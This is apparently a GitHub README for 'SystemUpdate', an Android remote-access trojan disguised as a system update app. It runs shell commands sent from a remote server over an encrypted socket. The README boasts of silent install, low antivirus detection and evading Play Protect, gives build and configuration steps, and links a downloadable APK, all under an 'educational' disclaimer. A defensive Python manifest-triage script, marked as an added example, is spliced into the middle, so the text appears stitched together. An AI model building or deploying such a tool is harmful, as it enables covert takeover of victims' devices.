⚠️ DISCLAIMER: This project is intended for educational and ethical testing purposes only.
It demonstrates how Android foreground services and socket communication work.
It is not stealth malware, and must not be used for illegal or harmful activities.
📲 This demo shows the APK being installed silently on an Android 15 device
— no popups, security prompts, or warnings — even with the August 3, 2025 security patch.
It appears as a normal system update app.
Only 2 engines flagged the APK:
- Google → Android:Agent-GEN
- IKARUS → Trojan.AndroidOS.Agent
✅ Google Play Protect DID NOT block installation or execution.
⚠️ Low detection is due to simplicity and unfamiliar signature — not because it’s stealthy or advanced.
SystemUpdate runs as a foreground Android service:
- Shows a persistent notification: “Updating system…”
- Connects to a hardcoded IP/Port
- Uses AES encryption to receive commands and send output
- Executes remote shell commands from server
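
For triage, the traits listed above (a system-update appearance, a foreground service, network access) can be checked in a decoded `AndroidManifest.xml`. The Python check below is an added example, not code from this repository; the package name, label and manifest contents are constructed, and the service name is assumed from the `PayloadService.kt` file name.

```python
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
# Heuristic only: packages under these prefixes are treated as platform apps.
PLATFORM_PREFIXES = ("com.android.", "com.google.android.")
UPDATE_LABEL = re.compile(r"system\s*update|updating\s+system", re.IGNORECASE)

# Constructed sample manifest (decoded text form). Package and label are
# made up; the service name is assumed from the PayloadService.kt file name.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.systemupdate">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.FOREGROUND_SERVICE"/>
  <application android:label="System Update">
    <service android:name=".PayloadService" android:exported="false"/>
  </application>
</manifest>
"""


def triage_manifest(xml_text):
    """Return the traits found in a decoded AndroidManifest.xml."""
    root = ET.fromstring(xml_text.strip())
    package = root.get("package", "")
    perms = {p.get(ANDROID_NS + "name") for p in root.iter("uses-permission")}
    app = root.find("application")
    # Literal labels only; an "@string/..." reference must be resolved
    # against res/values/strings.xml before matching.
    label = app.get(ANDROID_NS + "label", "") if app is not None else ""
    services = [s.get(ANDROID_NS + "name") for s in root.iter("service")]

    findings = []
    if not package.startswith(PLATFORM_PREFIXES) and UPDATE_LABEL.search(label):
        findings.append("third-party app labelled as a system update")
    if services and "android.permission.FOREGROUND_SERVICE" in perms:
        findings.append("declares a service and may run it in the foreground")
    if "android.permission.INTERNET" in perms:
        findings.append("can open network sockets")
    # All three together match the behaviour this README describes.
    return {"package": package, "services": services,
            "findings": findings, "suspicious": len(findings) == 3}


if __name__ == "__main__":
    report = triage_manifest(SAMPLE_MANIFEST)
    print(report["package"], report["services"], report["suspicious"])
    for finding in report["findings"]:
        print(" -", finding)
```

Each trait is common in legitimate apps on its own, so treat the combined result as a prompt for manual review rather than a verdict.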
- Clone this repo
- Open `PayloadService.kt` and edit: `SERVER_IP`, `SERVER_PORT`, `SECRET_KEY`
- Build the APK with Android Studio
- Install on a test device (Android 13–15+)
- Start your TCP server and connect
🔐 Encrypted demo ZIP (APK + media) hosted on Mega:
📦 Download from MEGA
Password: 1234
Contents:
- `SystemUpdate.apk`
- Demo video (`1.mp4`)
- VirusTotal results (`1.jpeg`, `2.jpeg`)
- Install GIF (`1.gif`)
This code is licensed under the GNU General Public License v3.
You're free to use, modify, and redistribute, but any derivative must remain open-source under the same license.
See LICENSE for details.
This project is a simple educational sandbox for:
- Android services
- Encrypted socket communication
- Remote shell execution testing
It is not obfuscated, does not attempt to bypass advanced security, and should only be used in controlled, ethical environments.
💡 Be curious, not malicious.